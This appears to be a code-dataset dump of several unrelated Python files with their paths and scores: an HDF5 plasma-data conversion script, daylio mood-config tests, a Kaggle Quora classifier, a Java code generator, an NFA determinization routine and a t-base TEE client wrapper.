(resource_type,'') resource_unit = digigrp['CHANNEL 0']['UNITS'][0].decode('utf-8') attrs['motion_unit'] = ('mm', '') if resource_type == 'SCOPE': dataname = 'TRACE' nshots = digigrp['CHANNEL 0'][dataname].shape[0] nti = digigrp['CHANNEL 0'][dataname].shape[1] dt = digigrp['CHANNEL 0'][dataname].attrs['WAVEFORM DT'] * u.s attrs['dt'] = [str(dt.value), str(dt.unit) ] #attrs['dt'] = [s.encode('utf-8') for s # in [str(dt.value), str(dt.unit) ] ] elif resource_type == 'MOTOR BOARD': dataname = 'POSITION' nshots = digigrp['CHANNEL 0'][dataname].shape[0] nti = 1 #Create the destination file with h5py.File(dest.file, "a") as df: #Create the dest group, throw error if it exists if dest.group is not '/' and dest.group in df.keys(): raise hdftools.hdfGroupExists(dest) grp = df[dest.group] #Initialize the output data array if 'data' in grp.keys(): raise hdftools.hdfDatasetExists(str(dest) + ' -> ' + "'data'") #Create the dataset + associated attributes grp.require_dataset("data", (nshots, nti, nchan), np.float32, chunks=(1, np.min([nti, 20000]), 1), compression='gzip') grp['data'].attrs['unit'] = resource_unit dimlabels = ['shots', 'time', 'chan'] grp['data'].attrs['dimensions'] = [s.encode('utf-8') for s in dimlabels] #Open the hdf5 file and copy the data over with h5py.File(src) as sf: #Initialize time-remaining printout tr = util.timeRemaining(nchan*nshots) #Loop through the channels and shots, reading one-by-one into the #output dataset for chan in range(nchan): digi_name = 'RESOURCE ' + str(channel_arr[chan][0]) chan_name = 'CHANNEL ' + str(channel_arr[chan][1]) if verbose: print("Reading channel: " + str(chan+1) + '/' + str(nchan)) for shot in range(nshots): if verbose: tr.updateTimeRemaining(nshots*chan + shot) #Read the data from the hdf5 file grp['data'][shot,:,chan] = sf[digi_name][chan_name][dataname][shot, ...] 
if pos_chan['x'] is not None or pos_chan['y'] is not None or pos_chan['z'] is not None: grp.require_dataset('pos', (nshots, 3), np.float32) ax = ['x', 'y', 'z'] unit_factor = (1.0*u.Unit(attrs['motion_unit'][0])).to(u.cm).value attrs['motion_unit'] = ('cm', '') for i, a in enumerate(ax): if pos_chan[a] is not None: resname = 'RESOURCE ' + str(pos_chan[a][0]) channame = 'CHANNEL ' + str(int(pos_chan[a][1])) try: posdata = sf[resname][channame]['POSITION'][:]*unit_factor except KeyError: print("(!) POSITION Information not found for " + resname) print("If motion is not included in run, set resource to NA in csv") #Handle the case where the multiple data points were #taken at a position so npos!=nshots npos = posdata.size if npos != nshots: posdata = np.repeat(posdata, int(nshots/npos)) grp['pos'][:, i] = posdata else: grp['pos'][:, i] = np.zeros(nshots) #Create the axes grp.require_dataset('shots', (nshots,), np.float32, chunks=True )[:] = np.arange(nshots) grp['shots'].attrs['unit'] = '' grp.require_dataset('chan', (nchan,), np.float32, chunks=True)[:] = np.arange(nchan) grp['chan'].attrs['unit'] = '' if resource_type == 'SCOPE': t = np.arange(nti)*dt grp.require_dataset('time', (nti,), np.float32, chunks=True)[:] = t.value grp['time'].attrs['unit'] = str(t.unit) #Write the attrs dictioanry into attributes of the new data group hdftools.writeAttrs(attrs, grp) return dest #Simple test program if __name__ == "__main__": #hdf_dir = os.path.join("F:", "LAPD_Mar2018", "HDF") #csv_dir = os.path.join("F:", "LAPD_Mar2018", "METADATA") #dest = hdftools.hdfPath( r"F:/LAPD_Mar2018/RAW/run102_PL11B_raw.hdf5") probe = 'tdiode' #probe = 'PLL_B1' run = 6 hdf_dir = '/Volumes/PVH_DATA/2019BIERMANN/HDF/' csv_dir = '/Volumes/PVH_DATA/2019BIERMANN/METADATA/' dest = hdftools.hdfPath( '/Volumes/PVH_DATA/2019BIERMANN/RAW/' + 'run' + str(run) + '_' + probe + '_raw.hdf5') #Delete the output file if it already exists try: os.remove(dest.file) except FileNotFoundError: pass print('reading') 
util.mem() tstart = util.timeTest() x = hrrToRaw(run, probe, hdf_dir, csv_dir, dest, verbose=True) util.timeTest(t0=tstart) util.mem() print('done')
0.30965
0.389488
from unittest import TestCase from daylio_parser.config import ( DEFAULT_COLOR_PALETTE, DEFAULT_MOODS, Mood, MoodConfig, MoodNotFound, ) class TestConfig(TestCase): def test_default_mood_list(self): """Test that the default config contains 5 moods with known boundaries.""" m = MoodConfig() self.assertEqual(m.moods[0].name, 'awful') self.assertEqual(m.moods[0].level, 1) self.assertEqual(m.moods[0].boundaries, (1, 1.5)) self.assertEqual(m.moods[0].color, DEFAULT_COLOR_PALETTE[0]) self.assertEqual(m.moods[1].name, 'bad') self.assertEqual(m.moods[1].level, 2) self.assertEqual(m.moods[1].boundaries, (1.5, 2.5)) self.assertEqual(m.moods[1].color, DEFAULT_COLOR_PALETTE[1]) self.assertEqual(m.moods[2].name, 'meh') self.assertEqual(m.moods[2].level, 3) self.assertEqual(m.moods[2].boundaries, (2.5, 3.5)) self.assertEqual(m.moods[2].color, DEFAULT_COLOR_PALETTE[2]) self.assertEqual(m.moods[3].name, 'good') self.assertEqual(m.moods[3].level, 4) self.assertEqual(m.moods[3].boundaries, (3.5, 4.5)) self.assertEqual(m.moods[3].color, DEFAULT_COLOR_PALETTE[3]) self.assertEqual(m.moods[4].name, 'rad') self.assertEqual(m.moods[4].level, 5) self.assertEqual(m.moods[4].boundaries, (4.5, 5.01)) self.assertEqual(m.moods[4].color, DEFAULT_COLOR_PALETTE[4]) def test_custom_moods(self): """Here we test that custom moods have correctly computed boundaries.""" moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (5, 'good'), ] m = MoodConfig(moods) self.assertEqual(m.moods[0].name, 'bad') self.assertEqual(m.moods[0].level, 1) self.assertEqual(m.moods[0].boundaries, (1, 1.5)) self.assertEqual(m.moods[1].name, 'almost bad') self.assertEqual(m.moods[1].level, 2) self.assertEqual(m.moods[1].boundaries, (1.5, 2.5)) self.assertEqual(m.moods[2].name, 'neutral') self.assertEqual(m.moods[2].level, 3) self.assertEqual(m.moods[2].boundaries, (2.5, 3.5)) self.assertEqual(m.moods[3].name, 'almost good') self.assertEqual(m.moods[3].level, 4) self.assertEqual(m.moods[3].boundaries, 
(3.5, 4.5)) self.assertEqual(m.moods[4].name, 'good') self.assertEqual(m.moods[4].level, 5) self.assertEqual(m.moods[4].boundaries, (4.5, 5.01)) def test_validation(self): """Test wrong mood lists.""" # Only 1 mood moods = [ (1, 'bad', 'red'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Bad formatting moods = [ ('bad',), ('almost bad',), ('neutral',), ('almost good',), ('good',), ] with self.assertRaises(ValueError): MoodConfig(moods) # Missing level moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (4, 'good'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Wrong level moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (5, 'good'), (6, 'rad'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Wrong palette colors = [ 'red', ] with self.assertRaises(ValueError): MoodConfig(DEFAULT_MOODS, colors) def test_custom_colors(self): """Test custom color palette.""" colors = [ 'black', 'red', 'orange', 'yellow', 'green', ] m = MoodConfig(DEFAULT_MOODS, colors) self.assertEqual(m.moods[0].color, 'black') self.assertEqual(m.moods[1].color, 'red') self.assertEqual(m.moods[2].color, 'orange') self.assertEqual(m.moods[3].color, 'yellow') self.assertEqual(m.moods[4].color, 'green') def test_get_mood(self): """Test getter by mood name.""" m = MoodConfig() expected = Mood('good', 4, '#4CA369', (3.5, 4.5)) self.assertEqual(m.get('good'), expected) def test_get_mood_missing(self): m = MoodConfig() with self.assertRaises(MoodNotFound): m.get("this does not exist")
tests/test_config.py
from unittest import TestCase from daylio_parser.config import ( DEFAULT_COLOR_PALETTE, DEFAULT_MOODS, Mood, MoodConfig, MoodNotFound, ) class TestConfig(TestCase): def test_default_mood_list(self): """Test that the default config contains 5 moods with known boundaries.""" m = MoodConfig() self.assertEqual(m.moods[0].name, 'awful') self.assertEqual(m.moods[0].level, 1) self.assertEqual(m.moods[0].boundaries, (1, 1.5)) self.assertEqual(m.moods[0].color, DEFAULT_COLOR_PALETTE[0]) self.assertEqual(m.moods[1].name, 'bad') self.assertEqual(m.moods[1].level, 2) self.assertEqual(m.moods[1].boundaries, (1.5, 2.5)) self.assertEqual(m.moods[1].color, DEFAULT_COLOR_PALETTE[1]) self.assertEqual(m.moods[2].name, 'meh') self.assertEqual(m.moods[2].level, 3) self.assertEqual(m.moods[2].boundaries, (2.5, 3.5)) self.assertEqual(m.moods[2].color, DEFAULT_COLOR_PALETTE[2]) self.assertEqual(m.moods[3].name, 'good') self.assertEqual(m.moods[3].level, 4) self.assertEqual(m.moods[3].boundaries, (3.5, 4.5)) self.assertEqual(m.moods[3].color, DEFAULT_COLOR_PALETTE[3]) self.assertEqual(m.moods[4].name, 'rad') self.assertEqual(m.moods[4].level, 5) self.assertEqual(m.moods[4].boundaries, (4.5, 5.01)) self.assertEqual(m.moods[4].color, DEFAULT_COLOR_PALETTE[4]) def test_custom_moods(self): """Here we test that custom moods have correctly computed boundaries.""" moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (5, 'good'), ] m = MoodConfig(moods) self.assertEqual(m.moods[0].name, 'bad') self.assertEqual(m.moods[0].level, 1) self.assertEqual(m.moods[0].boundaries, (1, 1.5)) self.assertEqual(m.moods[1].name, 'almost bad') self.assertEqual(m.moods[1].level, 2) self.assertEqual(m.moods[1].boundaries, (1.5, 2.5)) self.assertEqual(m.moods[2].name, 'neutral') self.assertEqual(m.moods[2].level, 3) self.assertEqual(m.moods[2].boundaries, (2.5, 3.5)) self.assertEqual(m.moods[3].name, 'almost good') self.assertEqual(m.moods[3].level, 4) self.assertEqual(m.moods[3].boundaries, 
(3.5, 4.5)) self.assertEqual(m.moods[4].name, 'good') self.assertEqual(m.moods[4].level, 5) self.assertEqual(m.moods[4].boundaries, (4.5, 5.01)) def test_validation(self): """Test wrong mood lists.""" # Only 1 mood moods = [ (1, 'bad', 'red'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Bad formatting moods = [ ('bad',), ('almost bad',), ('neutral',), ('almost good',), ('good',), ] with self.assertRaises(ValueError): MoodConfig(moods) # Missing level moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (4, 'good'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Wrong level moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (5, 'good'), (6, 'rad'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Wrong palette colors = [ 'red', ] with self.assertRaises(ValueError): MoodConfig(DEFAULT_MOODS, colors) def test_custom_colors(self): """Test custom color palette.""" colors = [ 'black', 'red', 'orange', 'yellow', 'green', ] m = MoodConfig(DEFAULT_MOODS, colors) self.assertEqual(m.moods[0].color, 'black') self.assertEqual(m.moods[1].color, 'red') self.assertEqual(m.moods[2].color, 'orange') self.assertEqual(m.moods[3].color, 'yellow') self.assertEqual(m.moods[4].color, 'green') def test_get_mood(self): """Test getter by mood name.""" m = MoodConfig() expected = Mood('good', 4, '#4CA369', (3.5, 4.5)) self.assertEqual(m.get('good'), expected) def test_get_mood_missing(self): m = MoodConfig() with self.assertRaises(MoodNotFound): m.get("this does not exist")
0.834036
0.514705
import numpy as np # linear algebra np.set_printoptions(threshold=np.nan) import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../input")) print(os.listdir("../input/embeddings")) print(os.listdir("../input/embeddings/GoogleNews-vectors-negative300")) # Any results you write to the current directory are saved as output. import gensim from gensim.utils import simple_preprocess from keras.preprocessing.sequence import pad_sequences def load_x_from_df(df,model): sequences = [] for question_text in df['question_text'].values: tokens = simple_preprocess(question_text) sentence = [] for word in tokens: # print(model.wv[word]) if word in model.wv.vocab: sentence.append(model.wv[word]) if len(sentence) == 0: sentence = np.zeros((max_len,300)) sequences.append(np.mean(sentence,axis=1)) x = pad_sequences(sequences,dtype='float32', maxlen=max_len) x = x.reshape(x.shape[0],1,x.shape[1]) return x print('loading word2vec model...') model = gensim.models.KeyedVectors.load_word2vec_format('../input/embeddings/GoogleNews-vectors-negative300/GoogleNews-vectors-negative300.bin', binary=True) df = pd.read_csv('../input/train.csv') print('columns:',df.columns) pd.set_option('display.max_columns',None) print('df head:',df.head()) print('example of the question text values:',df['question_text'].head().values) print('what values contains target:',df.target.unique()) print('loading sequences...') max_len = df['question_text'].apply(lambda x:len(x)).max() print('max length of sequences:',max_len) print('creating sequences') x = load_x_from_df(df,model) print(x.shape) y = df.target.values print(y.shape) print('Creating model...') #inpiration from : https://github.com/keras-team/keras/blob/master/examples/imdb_fasttext.py from keras.models import Sequential from keras.layers 
import Dense from keras.layers import Masking from keras.layers import GlobalAveragePooling1D from keras.callbacks import EarlyStopping model = Sequential() model.add(Masking(input_shape=(x.shape[1],x.shape[2]))) model.add(GlobalAveragePooling1D()) model.add(Dense(1,activation='sigmoid')) model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy']) print(model.summary()) print('fiting model...') history = model.fit(x,y,validation_split=0.2,epochs=100, callbacks=[EarlyStopping(patience=20)]) print('model score:',model.evaluate(x,y)) import matplotlib.pyplot as plt plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.show()
kaggle-ml/quora/kernel.py
import numpy as np # linear algebra np.set_printoptions(threshold=np.nan) import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../input")) print(os.listdir("../input/embeddings")) print(os.listdir("../input/embeddings/GoogleNews-vectors-negative300")) # Any results you write to the current directory are saved as output. import gensim from gensim.utils import simple_preprocess from keras.preprocessing.sequence import pad_sequences def load_x_from_df(df,model): sequences = [] for question_text in df['question_text'].values: tokens = simple_preprocess(question_text) sentence = [] for word in tokens: # print(model.wv[word]) if word in model.wv.vocab: sentence.append(model.wv[word]) if len(sentence) == 0: sentence = np.zeros((max_len,300)) sequences.append(np.mean(sentence,axis=1)) x = pad_sequences(sequences,dtype='float32', maxlen=max_len) x = x.reshape(x.shape[0],1,x.shape[1]) return x print('loading word2vec model...') model = gensim.models.KeyedVectors.load_word2vec_format('../input/embeddings/GoogleNews-vectors-negative300/GoogleNews-vectors-negative300.bin', binary=True) df = pd.read_csv('../input/train.csv') print('columns:',df.columns) pd.set_option('display.max_columns',None) print('df head:',df.head()) print('example of the question text values:',df['question_text'].head().values) print('what values contains target:',df.target.unique()) print('loading sequences...') max_len = df['question_text'].apply(lambda x:len(x)).max() print('max length of sequences:',max_len) print('creating sequences') x = load_x_from_df(df,model) print(x.shape) y = df.target.values print(y.shape) print('Creating model...') #inpiration from : https://github.com/keras-team/keras/blob/master/examples/imdb_fasttext.py from keras.models import Sequential from keras.layers 
import Dense from keras.layers import Masking from keras.layers import GlobalAveragePooling1D from keras.callbacks import EarlyStopping model = Sequential() model.add(Masking(input_shape=(x.shape[1],x.shape[2]))) model.add(GlobalAveragePooling1D()) model.add(Dense(1,activation='sigmoid')) model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy']) print(model.summary()) print('fiting model...') history = model.fit(x,y,validation_split=0.2,epochs=100, callbacks=[EarlyStopping(patience=20)]) print('model score:',model.evaluate(x,y)) import matplotlib.pyplot as plt plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.show()
0.55447
0.245384
from typing import List # MONAD = "Reader" MONAD = "State" PARAM = MONAD[0] def generic(i: int) -> str: return chr(i + ord("A")) def arg(i: int) -> str: return chr(i + ord("a")) def arg2(i: int) -> str: return arg(i) + "2" def generics(i: int) -> List[str]: return [generic(i) for i in range(0, i + 1)] def result_generics(i: int) -> List[str]: res = list(PARAM) res.extend(generics(i)) return res def wrap(cs: List[str]) -> str: return "<" + ", ".join(cs) + ">" def monadic(i: int) -> str: return MONAD + wrap([PARAM, generic(i)]) def liftN(i: int) -> str: return "lift%d" % i def functionN(i: int) -> str: return "Function%d" % i def func_args(i: int) -> str: args = [f"{functionN(i)}{wrap(generics(i))} func"] args.extend(monadic_args(i)) return ", ".join(args) def monadic_arg(i: int) -> str: return f"{monadic(i)} {arg(i)}" def monadic_args(n: int) -> List[str]: return [monadic_arg(i) for i in range(0, n)] def curried_type(n: int) -> str: def ty(i: int) -> str: if i + 1 == n: return f"Function1<{generic(i)}, {generic(i+1)}>" else: return f"Function1<{generic(i)}, {ty(i+1)}>" return ty(0) def applies(i: int) -> str: lst = ["func"] lst.extend([f"apply{a}" for a in curried_args(i)]) return ".".join(lst) def curried_args(n: int) -> List[str]: return [f"({arg2(i)})" for i in range(0, n)] def curried_value(i: int) -> str: args = curried_args(i) args.append(applies(i)) return " -> ".join(args) def curried(i: int) -> str: return f"{curried_type(i)} curried = {curried_value(i)};" def return_val(i: int) -> str: assert i >= 0 if i == 0: return f"{arg(i)}.map(curried)" else: return f"ap({return_val(i-1)}, {arg(i)})" for i in range(2, 9): print( "public static", wrap(result_generics(i)), monadic(i), liftN(i), "(", func_args(i), "){", ) print(curried(i)) print(f"return {return_val(i-1)};") print("}")
GenCode.py
from typing import List # MONAD = "Reader" MONAD = "State" PARAM = MONAD[0] def generic(i: int) -> str: return chr(i + ord("A")) def arg(i: int) -> str: return chr(i + ord("a")) def arg2(i: int) -> str: return arg(i) + "2" def generics(i: int) -> List[str]: return [generic(i) for i in range(0, i + 1)] def result_generics(i: int) -> List[str]: res = list(PARAM) res.extend(generics(i)) return res def wrap(cs: List[str]) -> str: return "<" + ", ".join(cs) + ">" def monadic(i: int) -> str: return MONAD + wrap([PARAM, generic(i)]) def liftN(i: int) -> str: return "lift%d" % i def functionN(i: int) -> str: return "Function%d" % i def func_args(i: int) -> str: args = [f"{functionN(i)}{wrap(generics(i))} func"] args.extend(monadic_args(i)) return ", ".join(args) def monadic_arg(i: int) -> str: return f"{monadic(i)} {arg(i)}" def monadic_args(n: int) -> List[str]: return [monadic_arg(i) for i in range(0, n)] def curried_type(n: int) -> str: def ty(i: int) -> str: if i + 1 == n: return f"Function1<{generic(i)}, {generic(i+1)}>" else: return f"Function1<{generic(i)}, {ty(i+1)}>" return ty(0) def applies(i: int) -> str: lst = ["func"] lst.extend([f"apply{a}" for a in curried_args(i)]) return ".".join(lst) def curried_args(n: int) -> List[str]: return [f"({arg2(i)})" for i in range(0, n)] def curried_value(i: int) -> str: args = curried_args(i) args.append(applies(i)) return " -> ".join(args) def curried(i: int) -> str: return f"{curried_type(i)} curried = {curried_value(i)};" def return_val(i: int) -> str: assert i >= 0 if i == 0: return f"{arg(i)}.map(curried)" else: return f"ap({return_val(i-1)}, {arg(i)})" for i in range(2, 9): print( "public static", wrap(result_generics(i)), monadic(i), liftN(i), "(", func_args(i), "){", ) print(curried(i)) print(f"return {return_val(i-1)};") print("}")
0.629888
0.536738
__author__ = "<NAME>" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __copyright__ = "Copyright (C) 2020, Nokia" __license__ = "BSD-3" from pybgl.automaton import Automaton, alphabet, add_vertex, add_edge, delta, set_final from pybgl.nfa import Nfa, initials, is_final, sigma def moore_determination(nfa :Nfa, dfa :Automaton = None, complete :bool = True) -> Automaton: """ Converts the input NFA into a DFA. The output DFA has a state for every *reachable* subset of states in the input NFA. In the worst case, there will be an exponential increase in the number of states. Args: nfa: An `Nfa` instance. dfa: Pass `None` or a reference to an empty `Automaton` instance. complete: Pass `True` to build the complete automaton (original algorithm). Pass `False` to build a smaller automaton (this save the "trash" state and its corresponding input transitions). Returns: The corresponding `Automaton` instance. """ def dfa_add_state(qs): q = map_qs_q[qs] = add_vertex(dfa) if any(is_final(_, nfa) for _ in qs): set_final(q, dfa) return q full_sigma = alphabet(nfa) if dfa is None: dfa = Automaton() map_qs_q = dict() # Maps subset of states of nfa with the corresponding dfa state. q0s = frozenset(initials(nfa)) unprocessed_qs = set() # Keeps track of qs for which delta is not yet installed in dfa unprocessed_qs.add(q0s) q0 = dfa_add_state(q0s) while unprocessed_qs: qs = unprocessed_qs.pop() q = map_qs_q[qs] sigma_ = ( full_sigma if complete else set.union(*[sigma(q, nfa) for q in qs]) if qs else set() ) for a in sigma_: rs = ( frozenset(set.union(*[delta(q, a, nfa) for q in qs])) if qs else frozenset() ) r = map_qs_q.get(rs) if r is None: r = dfa_add_state(rs) unprocessed_qs.add(rs) add_edge(q, r, a, dfa) return dfa
pybgl/moore_determination.py
__author__ = "<NAME>" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __copyright__ = "Copyright (C) 2020, Nokia" __license__ = "BSD-3" from pybgl.automaton import Automaton, alphabet, add_vertex, add_edge, delta, set_final from pybgl.nfa import Nfa, initials, is_final, sigma def moore_determination(nfa :Nfa, dfa :Automaton = None, complete :bool = True) -> Automaton: """ Converts the input NFA into a DFA. The output DFA has a state for every *reachable* subset of states in the input NFA. In the worst case, there will be an exponential increase in the number of states. Args: nfa: An `Nfa` instance. dfa: Pass `None` or a reference to an empty `Automaton` instance. complete: Pass `True` to build the complete automaton (original algorithm). Pass `False` to build a smaller automaton (this save the "trash" state and its corresponding input transitions). Returns: The corresponding `Automaton` instance. """ def dfa_add_state(qs): q = map_qs_q[qs] = add_vertex(dfa) if any(is_final(_, nfa) for _ in qs): set_final(q, dfa) return q full_sigma = alphabet(nfa) if dfa is None: dfa = Automaton() map_qs_q = dict() # Maps subset of states of nfa with the corresponding dfa state. q0s = frozenset(initials(nfa)) unprocessed_qs = set() # Keeps track of qs for which delta is not yet installed in dfa unprocessed_qs.add(q0s) q0 = dfa_add_state(q0s) while unprocessed_qs: qs = unprocessed_qs.pop() q = map_qs_q[qs] sigma_ = ( full_sigma if complete else set.union(*[sigma(q, nfa) for q in qs]) if qs else set() ) for a in sigma_: rs = ( frozenset(set.union(*[delta(q, a, nfa) for q in qs])) if qs else frozenset() ) r = map_qs_q.get(rs) if r is None: r = dfa_add_state(rs) unprocessed_qs.add(rs) add_edge(q, r, a, dfa) return dfa
0.790732
0.353847
import ctypes import io import os import struct import sys from contextlib import contextmanager from . import mcclient_const as const from . import mcclient_types as types if 'sphinx' in sys.modules: client = None else: client = types.load_library() if client is None: raise ImportError("ERROR: fail to load the dynamic library.") class Error(Exception): """ This exception is raised when a function doesn't return successfully. """ def __init__(self, code): self._code = code @property def code(self): """ The error code returned by the function. """ return self._code def __str__(self): special = ["NO_NOTIFICATION", "INFO_NOTIFICATION"] for name in dir(const): if getattr(const, name) == self._code \ and (name.startswith("ERR_") or name in special): return name return "ERR_UNKNOWN" class Device(object): """ Initialize a session with a t-base device. Args: device_id (:obj:`int`): Identifier for the t-base device to be used. DEVICE_ID_DEFAULT refers to the default device. This class can be used with a Python "with statement", meaning that it will automatically call :func:`Device.open` on enter and :func:`Device.close` on exit. :: with Device() as dev: # do something with the device """ def __init__(self, id=const.DEVICE_ID_DEFAULT): self._id = id @property def id(self): """ The identifier for the t-base device used. """ return self._id def __enter__(self): self.open() return self def __exit__(self, *_): self.close() return False def open(self): """ Open a new connection to a t-base device. It initializes all device specific resources required to communicate with an t-base instance located on the specified device in the system. 
Raises: :class:`Error`: See below the possible error codes: - ERR_INVALID_OPERATION if device already opened - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_UNKNOWN_DEVICE when device_id is unknown - ERR_INVALID_DEVICE_FILE if kernel module under /dev/mobicore cannot be opened """ res = client.mcOpenDevice(self._id) if res != const.OK: raise Error(res) def close(self): """ Close the connection to a t-base device. When closing a device, active sessions have to be closed beforehand. Resources associated with the device will be released. The device may be opened again after it has been closed. Raises: :class:`Error`: See below the possible error codes: - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_SESSION_PENDING when a session is still open - ERR_DAEMON_UNREACHABLE when problems with daemon occur """ res = client.mcCloseDevice(self._id) if res != const.OK: raise Error(res) @contextmanager def buffer(self, len): """ Instantiate a new memory buffer. Args: len (:obj:`int`): Length of the block in bytes Yields: :class:`Buffer`: The allocated block of memory This method can be used with a Python "with statement", meaning that it will automatically call :func:`Device.malloc` on enter and :func:`Device.free` on exit. :: with dev.buffer(0x1000) as tci: # do something with the buffer """ buf = self.malloc(len) yield buf self.free(buf) def malloc(self, len): """ Allocate a block of memory. The driver allocates a contiguous block of memory which can be used as WSM. This implicates that the allocated memory is always aligned to 4K. 
Args: len (:obj:`int`): Length of the block in bytes Returns: :class:`Buffer`: The allocated block of memory Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_NO_FREE_MEMORY if no more contiguous memory is available in this size or for this process """ buf = ctypes.POINTER(ctypes.c_uint8)() res = client.mcMallocWsm(self._id, 0, len, ctypes.byref(buf), 0) if res != const.OK: raise Error(res) ptr = ctypes.cast(buf, ctypes.c_void_p) return Buffer(ptr, len) def free(self, buf): """ Free a block of memory. The driver will free a block of memory previously allocated. Args: buf (:class:`Buffer`): The memory block to be freed Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_FREE_MEMORY_FAILED on failures """ ptr = ctypes.cast(buf._ptr, ctypes.POINTER(ctypes.c_uint8)) res = client.mcFreeWsm(self._id, ptr) if res != const.OK: raise Error(res) buf.close() def version(self): """ Get t-base version information of a device. Returns: :obj:`dict`: t-base version info :: { 'productId': b't-base-EXYNOS64-Android-302A-V015-681_681', 'versionMci': 65536, 'versionSo': 131074, 'versionMclf': 131077, 'versionContainer': 131073, 'versionMcConfig': 2, 'versionTlApi': 65552, 'versionDrApi': 65538, 'versionCmp': 0 } Raises: :class:`Error`: See below the possible error codes: - ERR_UNKNOWN_DEVICE when device is not open - INVALID_PARAMETER if a parameter is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur """ info = types.mcVersionInfo() res = client.mcGetMobiCoreVersion(self._id, ctypes.byref(info)) if res != const.OK: raise Error(res) return dict(info) class Trustlet(object): """ Initialize a session to a Trusted Application. 
Args: dev (:class:`Device`): The t-base device to use tci (:class:`Buffer`): TCI buffer for communicating with the TA buf (:obj:`bytes`): Buffer containing the TA binary This class can be used with a Python "with statement", meaning that it will automatically call :func:`Trustlet.open` on enter and :func:`Trustlet.close` on exit. :: with Trustlet(dev, tci, buf) as app: # do something with the trustlet """ @staticmethod def uuid(dev, tci, uuid): """ Initialize a session to a TA using its UUID. Args: dev (:class:`Device`): The t-base device to use tci (:class:`Buffer`): TCI buffer for communicating with the TA buf (:obj:`str`): The Trusted Application's UUID Returns: :class:`Trustlet`: A Trusted Application session """ path = "/vendor/app/mcRegistry/{}.tlbin".format(uuid) if not os.path.exists(path): path = "/system/app/mcRegistry/{}.tlbin".format(uuid) if not os.path.exists(path): raise IOError("Could not find the trustlet") with open(path, "rb") as fd: return Trustlet(dev, tci, fd.read()) def __init__(self, dev, tci, buf): self._ses = types.mcSessionHandle() self._ses.device_id = dev.id self._tci = tci self._buf = buf @property def id(self): """ The identifier of the Trusted Application session. """ return self._ses.sessionId def __enter__(self): self.open() return self def __exit__(self, *_): self.close() return False def open(self): """ Open a new session to a Trusted Application (Trustlet). The trustlet will be loaded from the memory buffer. Write MCP open message to buffer and notify t-base about the availability of a new command. Waits till t-base responds with the new session ID (stored in the MCP buffer). 
Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if session parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon socket occur - ERR_UNKNOWN_DEVICE when daemon returns an error - ERR_TRUSTED_APPLICATION_NOT_FOUND when TA cannot be loaded """ ta = (ctypes.c_uint8 * len(self._buf)).from_buffer_copy(self._buf) ta_ptr = ctypes.cast(ta, ctypes.POINTER(ctypes.c_uint8)) tci_ptr = ctypes.cast(self._tci._ptr, ctypes.POINTER(ctypes.c_uint8)) res = client.mcOpenTrustlet(ctypes.byref(self._ses), 0, ta_ptr, len(self._buf), tci_ptr, self._tci._len) if res != const.OK: raise Error(res) def close(self): """ Close a Trusted Application session. Closes the specified t-base session. The call will block until the session has been closed. Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if session parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_INVALID_DEVICE_FILE when daemon cannot open trustlet file """ res = client.mcCloseSession(ctypes.byref(self._ses)) if res != const.OK: raise Error(res) def notify(self): """ Notify a session. Notifies the session end point about available message data. Corresponding errors can only be received by :func:`Trustlet.wait_notification`. A session has to be opened in advance. Raises: :class:`Error`: See below the possible error codes: - DRV_INVALID_PARAMETER if session parameter is invalid - DRV_ERR_UNKNOWN_SESSION when session id is invalid - DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid """ res = client.mcNotify(self._ses) if res != const.OK: raise Error(res) def wait_notification(self, timeout=const.INFINITE_TIMEOUT): """ Wait for a notification. Wait for a notification issued by t-base for a specific session. 
